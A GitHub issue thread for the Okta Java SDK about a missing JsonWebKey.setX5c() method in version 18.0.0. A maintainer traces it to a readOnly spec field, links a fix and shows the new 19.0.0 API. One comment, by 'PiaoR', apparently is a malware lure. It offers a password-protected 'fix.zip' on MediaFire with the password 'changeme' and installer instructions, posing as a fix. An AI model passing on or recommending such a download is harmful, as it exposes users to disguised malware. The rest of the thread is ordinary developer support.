### ISSUE TITLE
Missing JsonWebKey.setX5c() method in 18.0.0 

### ISSUE THREAD

**Issue by carlsandland** [okta/okta-sdk-java#1547]
### Describe the bug?

My code that creates an IDP dynamically calls this code to set the cert chain for the key from a PEM file, used to work fine:
```
var key = new JsonWebKey();
key.setX5c(Collections.singletonList(sanitizedx509CertStr));
```
when moving to 18.0.0 this method is not available in JsonWebKey class, but getX5c and it's underlying list property is still there. Please send help (or let me know if this is a bug). I need it to call oktaApi.createIdentityProviderKey(jsonWebKey), which wraps the POST to /api/v1/idps/credentials/keys

### What is expected to happen?

My old code should compile.

### What is the actual behavior?

It doesn't compile (missing method).

### Reproduction Steps?

My current pom is:
```
  <dependency>
       <groupId>com.okta.sdk</groupId>
       <artifactId>okta-sdk-api</artifactId>
       <version>18.0.0</version>
  </dependency>
  <dependency>
      <groupId>com.okta.sdk</groupId>
      <artifactId>okta-sdk-impl</artifactId>
      <version>18.0.0</version>
      <scope>runtime</scope>
  </dependency>

```

### Java Version

openjdk version "11.0.23" 2024-04-16 LTS
OpenJDK Runtime Environment Corretto-11.0.23.9.1 (build 11.0.23+9-LTS)
OpenJDK 64-Bit Server VM Corretto-11.0.23.9.1 (build 11.0.23+9-LTS, mixed mode)

### SDK Version

18.0.0

### OS version

Darwin csandlan-mac-0 23.6.0 Darwin Kernel Version 23.6.0: Mon Jul 29 21:14:30 PDT 2024; root:xnu-10063.141.2~1/RELEASE_ARM64_T6030 arm64

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by carlsandland** [comment]
Probably a result of readonly here from swagger:
```
x5c:
          description: X.509 certificate chain that contains a chain of one or more certificates
          type: array
          items:
            type: string
          readOnly: true
```

**Comment by arvindkrishnakumar-okta** [comment]
Yes it was a spec issue, will get it fixed.

**Comment by arvindkrishnakumar-okta** [comment]
@carlsandland this should fix - https://github.com/okta/okta-sdk-java/pull/1553/files

**Comment by arvindkrishnakumar-okta** [comment]
@carlsandland with the above PR merge, 19.0.0 will be released soon. You will be able to do `createIdentityProviderKey(..)` with your `X5c` set like this:

```
IdentityProviderApi identityProviderApi = new IdentityProviderApi(client);
IdentityProviderKeysApi identityProviderKeysApi = new com.okta.sdk.resource.api.IdentityProviderKeysApi(client);

IdPCertificateCredential idPCertificateCredential = new IdPCertificateCredential();
idPCertificateCredential.setX5c(...);

identityProviderKeysApi.createIdentityProviderKey(idPCertificateCredential);
```

**Comment by carlsandland** [comment]
Thanks @arvindkrishnakumar-okta for following through on this, appreciated.
